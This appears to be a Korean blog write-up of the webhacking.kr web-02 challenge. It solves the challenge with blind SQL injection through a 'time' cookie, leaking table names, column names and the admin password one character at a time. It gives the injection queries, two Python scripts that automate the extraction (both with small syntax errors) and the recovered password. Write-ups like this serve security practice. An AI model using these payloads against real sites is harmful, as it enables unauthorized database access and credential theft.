반응형
문제
if you access admin.php ~
webhacking.kr/challenge/web-02/admin.php
admin.php 페이지를 확인할 수 있다.
비밀번호를 찾으면 문제 해결된다.
문제 풀이
비밀번호를 찾기 위해서 이전 페이지로 돌아간다.
쿠키의 값에 따라 주석이 변화하는 것을 확인할 수 있다.
<!--
2022-10-30 06:43:47
-->
<!--
2070-01-01 09:00:01
-->
SQLI 공격이 가능한 것을 확인할 수 있다.
SQLI - 테이블 개수 확인
select count(table_name) from information_schema.tables where table_schema=database()
<!--
2070-01-01 09:00:02
-->
SQLI - 테이블 이름 길이 확인
select length(table_name) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:00:13
-->
select length(table_name) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:00:03
-->
SQLI - 두번째 테이블 이름 확인
select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:01:48
-->
108->'l'select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:01:51
-->
111->'o'
select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema=database() limit 1,1
<!--
2070-01-01 09:01:43
-->
103->'g'
SQLI - 첫번째 테이블 이름 확인
select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:37
-->
97->'a'
select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:40
-->
100->'d'
select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:49
-->
109->'m'
select ascii(substr(table_name,13,1)) from information_schema.tables where table_schema=database() limit 0,1
<!--
2070-01-01 09:01:59
-->
119->'w'
import requests
def time(res):
val=0
val+=int(res.text[20])*60
val+=int(res.text[22])*10
val+=int(res.text[23])
return val
url="https://webhacking.kr/challenge/web-02/"
cookies=['PHPSESSID':'쿠키값']
name=""
for i in range(1,14):
cookies['time']="(select ascii(substr(table_name,{},1)) from information_schema.tables where table_schema=database() limit 0,1)".format(i)
res=requests.get(url, cookies=cookies)
name+=chr(time(res))
print(name)
#admin_area_pwSQLI - 컬럼 개수 확인
select count(column_name) from information_schema.columns where table_name="admin_area_pw"
<!--
2070-01-01 09:00:01
-->
SQLI - 컬럼 이름 길이 확인
select length(column_name) from information_schema.columns where table_name="admin_area_pw" limit 0,1
<!--
2070-01-01 09:00:02
-->
SQLI - 컬럼 이름 확인
select ascii(substr(column_name,1,1)) from information_schema.columns where table_name="admin_area_pw" limit 0,1
<!--
2070-01-01 09:01:52
-->
112->'p'
select ascii(substr(column_name,2,1)) from information_schema.columns where table_name="admin_area_pw" limit 0,1
<!--
2070-01-01 09:01:59
-->
119->'w'
SQLI - ‘pw’ 개수, 길이 확인
select count(pw) from admin_area_pw
<!--
2070-01-01 09:00:01
-->
select length(pw) from admin_area_pw
<!--
2070-01-01 09:00:17
-->
SQLI - ‘pw’ 값 확인
select ascii(substring(pw,{},1)) from admin_area_pw limit 0,1
import requests
def time(res):
val=0
val+=int(res.text[20])*60
val+=int(res.text[22])*10
val+=int(res.text[23])
return val
url="https://webhacking.kr/challenge/web-02/"
cookies=['PHPSESSID':'']
name=""
for i in range(1,18):
cookies['time']="(select ascii(substr(pw,{},1)) from admin_area_pw".format(i)
res=requests.get(url, cookies=cookies)
name+=chr(time(res))
print(name)
#kudos_to_beistlab
반응형
'write-up(web) > webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] old-04 (0) | 2023.02.19 |
|---|---|
| [Webhacking.kr] old-03 (0) | 2023.02.18 |
| [Webhacking.kr] NotSQL (0) | 2023.01.19 |
| [Webhacking.kr] BABY (0) | 2023.01.16 |
| [Webhacking.kr] old-61 (0) | 2023.01.15 |